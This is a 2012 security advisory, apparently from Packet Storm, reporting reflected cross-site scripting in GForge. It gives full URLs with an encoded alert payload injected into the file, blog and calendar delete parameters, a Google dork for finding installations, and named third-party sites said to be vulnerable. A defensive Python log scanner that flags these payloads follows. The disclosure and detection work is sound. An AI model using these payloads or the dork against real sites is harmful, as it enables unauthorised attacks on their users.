
Gforge.org Cross Site Scripting

30 Jan 2012. Reported by Sony. Type: packetstorm. Source: packetstormsecurity.com

GForge.org Cross Site Scripting vulnerability details and Po

Code
`# Exploit Title: GForge Cross Site Scripting  
# Date: 30.01.2012  
# Author: Sony  
# Software Link: http://gforge.org  
# Google Dorks: inurl:gf/user/ site:edu (gov,com,org,etc..) or another  
dorks (it's simple)  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/01/gforge-cross-site-scripting.html  
..................................................................  
  
Well, we have interesting xss in the GForge.  
  
But we can test it on our accounts. We can make 2 accounts for test.  
  
XSS found in the files,calendar,messagewall (search users), blogs..  
  
Files.  
  
Upload our file.  
  
http://gforge.org/gf/user/eleo/userfiles/  
  
And press button delete and open link in the new window and add in the url  
our xss.  
  
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[ourxss  
is here]  
  
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://1.bp.blogspot.com/-ob_5W9q6IOE/TybK50KNkHI/AAAAAAAAAU4/zcX5uwx-FDs/s1600/1234.JPG  
  
Test this on your account name.  
  
Well, now..blog.  
  
Create post and press button delete and open link in the new window and add  
in the url our xss.  
  
gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2[xss is here]  
  
http://gforge.org/gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://1.bp.blogspot.com/-blGd0pC1uac/TybNH5m1LRI/AAAAAAAAAVE/X1_7uZTxpJ8/s1600/123454.JPG  
  
or..  
  
http://3.bp.blogspot.com/-QIqH6m6an2E/TybNMwaLUxI/AAAAAAAAAVQ/o439BgL8W2w/s1600/1234556.JPG  
  
Calendar..  
  
Open calendar and press button "add new event" and press button delete and  
open link in the new window and add in the url our xss.  
  
http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[ourxss  
is here]  
  
http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://4.bp.blogspot.com/-l2PehXdxhPY/TybOC9eI8bI/AAAAAAAAAVc/dQfmhxCLy1o/s1600/calendar.JPG  
  
And we have xss in the gf/my/messagewall/ (search users)  
  
http://2.bp.blogspot.com/-7snLqFJ--f0/TybPLb9Un-I/AAAAAAAAAVo/f-z-jsdO1ns/s1600/search_user.JPG  
  
http://3.bp.blogspot.com/-zNZi2myMDLc/TybPOlJUqfI/AAAAAAAAAV0/MTFCewGtziU/s1600/search_users2.JPG  
  
Also we can see in google that a lot of sites have a gforge and vulnerable  
to xss.  
  
Joomlacode.org  
  
http://2.bp.blogspot.com/-BbfJ7fJ20EI/TybQT5U2fYI/AAAAAAAAAWA/RYMoX_VQZUk/s1600/123.JPG  
  
Stanford.edu  
  
http://3.bp.blogspot.com/-neXykFEhP18/TybQeg0kScI/AAAAAAAAAWM/Wfpn7wAc0OQ/s1600/stan.JPG  
  
  
http://2.bp.blogspot.com/-7Zwn9dCa_Ms/TybQjpYnq6I/AAAAAAAAAWY/1ZxT_pDJXzE/s1600/stan2.JPG  
  
  
https://code.ros.org/gf/account/?action=UserAdd  
https://forge.si.umich.edu/gf/account/?action=UserAdd  
http://media.lbl.gov/gf/account/?action=UserAdd  
etc..  
  
  
It's not a critical vulnerability, but it's possible to use it to change  
url for different users.  
`
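
A defender-side check for the pattern this advisory describes, as an added example that is not part of the original advisory or of GForge's code: it scans web-server access log lines for the delete actions named above where `file_id`, `id`, `event_id` or `start_date` carries anything other than digits. The log lines, client addresses and the user name `alice` are constructed, and the assumption that these parameters are always plain integers is taken from the example URLs on this page.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters the advisory shows as injection points (assumed to be integers).
NUMERIC_PARAMS = {"file_id", "id", "event_id", "start_date"}
# Values of the "action" parameter that appear in the advisory's URLs.
ACTIONS = {"UserfileDelete", "UserblogDelete", "UsercalendarEventDelete"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jan/2012:10:00:01 +0000] "GET /gf/user/alice/userfiles/my/admin/?action=UserfileDelete&file_id=3089 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/Jan/2012:10:02:17 +0000] "GET /gf/user/alice/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29// HTTP/1.1" 200 5342',
    '203.0.113.9 - - [30/Jan/2012:10:03:40 +0000] "GET /gf/user/alice/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%22%3E%3CSCRIPT%3E HTTP/1.1" 200 6011',
    '203.0.113.7 - - [30/Jan/2012:10:05:02 +0000] "GET /gf/user/alice/userblog/my/admin/?action=UserblogDelete&id=2 HTTP/1.1" 200 4980',
]

def suspicious_params(request_target):
    """Return sorted names of numeric parameters that carry non-digit content."""
    parts = urlsplit(request_target)
    if "/gf/user/" not in parts.path:
        return []
    # parse_qsl percent-decodes values, so %27 and %3C are compared as ' and <.
    query = parse_qsl(parts.query, keep_blank_values=True)
    if not any(k == "action" and v in ACTIONS for k, v in query):
        return []
    return sorted({k for k, v in query
                   if k in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", v)})

def scan(lines):
    """Return (line_number, [parameter names]) for each log line to review."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        bad = suspicious_params(m.group(1)) if m else []
        if bad:
            hits.append((n, bad))
    return hits

if __name__ == "__main__":
    for line_no, params in scan(SAMPLE_LOG):
        print(f"line {line_no}: non-numeric value in {', '.join(params)}")
```

The same digits-only rule, applied server-side before the value is written into the page, rejects these requests outright; output encoding is still needed for parameters that legitimately hold text, such as the user search field.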

Vulners AI Score: 7.4 (High risk)